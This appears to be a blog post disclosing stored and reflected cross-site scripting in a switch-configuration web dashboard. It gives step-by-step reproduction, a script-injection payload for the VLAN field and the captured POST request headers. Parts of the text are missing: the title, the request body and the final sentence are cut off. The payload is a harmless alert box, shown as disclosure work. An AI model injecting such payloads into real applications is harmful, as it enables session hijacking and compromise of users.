Stored and reflected Cross-Site Scripting in

I have found two XSS vulnerabilities in one simple process of creating a new switch interface.

Below are the details.

  1. Navigate to “Access Switches Tour” -> “Switch” -> “Configure” -> “Routing and DHCP”.
  2. Click the “Add an interface” button and fill “Name”, “Interface IP” and “DHCP server IPs” with whatever data. As the VLAN put the following payload: 1<script>alert(‘’)</script>
  3. Click the “Save” button. There will be the following POST request:
POST /Live-Demo-Switch/n/kaGejdmc/manage/nodes/update_switch_l2_dhcp_relays
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: kMHJ7LD3eYdG+QsNbr9yeJ2a+ZRiEy5g/oaYIu7Tq8k=
X-Requested-With: XMLHttpRequest
Content-Length: 232
Connection: close


Then the JavaScript code will execute (reflected XSS). It is also a stored XSS, so it will fire up everytime the user navigates to

Leave a Reply

Your email address will not be published. Required fields are marked *